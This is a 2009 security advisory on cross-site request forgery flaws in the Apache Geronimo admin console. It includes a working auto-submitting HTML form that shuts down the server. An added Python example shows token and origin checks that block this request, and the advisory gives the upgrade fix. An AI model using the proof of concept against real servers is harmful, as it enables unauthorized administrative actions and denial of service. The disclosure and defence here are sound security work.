Various cross-site request forgery (XSRF or CSRF) vulnerabilities were identified in the Apache Geronimo web administration console.
Application: Apache Geronimo Application Server
Versions Affected: 2.1 - 2.1.3
Vendor URL: http://geronimo.apache.org/
Bug: Multiple XSRF Vulnerabilities
Exploits: YES
Reported: 10.12.2008
Vendor response: 10.12.2008
Solution: YES
Date of Public Advisory: 16.04.2009
CVE-number: 2009-0039
Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
***********
This affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to and including Geronimo 2.1.3.
Details
*******
Exploiting this issue may allow a remote attacker to perform certain administrative actions (e.g. change the web administration password, upload applications, etc.) using predictable URL requests once a user has authenticated and obtained a valid session with the server.
Example [Shutdown Server]:
<html>
<body>
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>
<input type=hidden value='Shutdown' name="shutdown">
<input type=submit>
</form>
<script>
document.getElementById(1).submit();
</script>
</body>
</html>
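The forged form above has no method attribute, so the browser submits it as a GET with the session cookie attached, and nothing in the request proves it came from the console's own page. The following is an added illustration, not Apache Geronimo code, of the checks a state-changing admin action needs to reject that request: require POST, require a per-session synchronizer token that a cross-site page cannot read, and compare the Origin or Referer against the console's host. The host name, the JSESSIONID cookie handling and the csrf_token field name are assumptions for the example; the action path is the one from the advisory.

```python
"""Added example: synchronizer-token CSRF check for a state-changing admin action.

Constructed illustration, not Apache Geronimo code. It models the console's
Shutdown action as a plain handler and shows the checks that would have
rejected the advisory's forged form.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

CONSOLE_HOST = "geronimo.example.test"              # hypothetical console host
SHUTDOWN_PATH = "/console/portal//Server/Shutdown"  # path prefix from the advisory

# session id -> CSRF token; stands in for the server's session store
SESSIONS: dict = {}


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def login() -> tuple[str, str]:
    """Create a session and bind a fresh random CSRF token to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = secrets.token_hex(16)
    return sid, SESSIONS[sid]


def same_origin(req: Request) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is the console host."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    return urlparse(src).netloc == CONSOLE_HOST


def authorize_shutdown(req: Request) -> tuple[bool, str]:
    """Decide whether a Shutdown request may proceed; returns (allowed, reason)."""
    if not req.path.startswith(SHUTDOWN_PATH):
        return False, "unknown action"
    sid = req.cookies.get("JSESSIONID")
    if sid not in SESSIONS:
        return False, "no authenticated session"
    if req.method != "POST":
        # The advisory's form has no method attribute, so the browser sends a GET.
        return False, "state change attempted with GET"
    token = req.form.get("csrf_token", "")
    # constant-time comparison against the token bound to this session
    if not hmac.compare_digest(token, SESSIONS[sid]):
        return False, "missing or invalid CSRF token"
    if not same_origin(req):
        return False, "cross-origin request"
    return True, "ok"


def run_demo() -> dict:
    """Replay three constructed requests against a logged-in session and collect the decisions."""
    sid, token = login()
    action = SHUTDOWN_PATH + "/__ac0x3console-base0x2ServerManager!-1172254814|0"
    # 1: the advisory's forged form, auto-submitted from a foreign page:
    #    the browser attaches the session cookie, no token, foreign Referer.
    forged = Request("GET", action + "?shutdown=Shutdown",
                     headers={"Referer": "http://attacker.invalid/page.html"},
                     cookies={"JSESSIONID": sid})
    # 2: the same forgery upgraded to POST, still without the token.
    forged_post = Request("POST", action, form={"shutdown": "Shutdown"},
                          headers={"Origin": "http://attacker.invalid"},
                          cookies={"JSESSIONID": sid})
    # 3: the administrator's own click from the console page.
    legit = Request("POST", action,
                    form={"shutdown": "Shutdown", "csrf_token": token},
                    headers={"Origin": "http://" + CONSOLE_HOST},
                    cookies={"JSESSIONID": sid})
    return {"forged_get": authorize_shutdown(forged),
            "forged_post": authorize_shutdown(forged_post),
            "legit": authorize_shutdown(legit)}


if __name__ == "__main__":
    for name, (ok, why) in run_demo().items():
        print(f"{name:12s} -> {'ALLOW' if ok else 'REJECT'} ({why})")
```

The Origin/Referer comparison is a second layer rather than a replacement for the token: browsers do not always send either header, so a handler that relied on them alone would have to choose between rejecting legitimate clients and letting headerless requests through.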
Solution
********
These security vulnerabilities were fixed in Geronimo 2.1.4 release.
New version of Geronimo 2.1.4 can be downloaded from this location:
http://geronimo.apache.org/downloads.html
An alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the administration web console application in the server.
Credits
*******
http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214
About
*****
Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru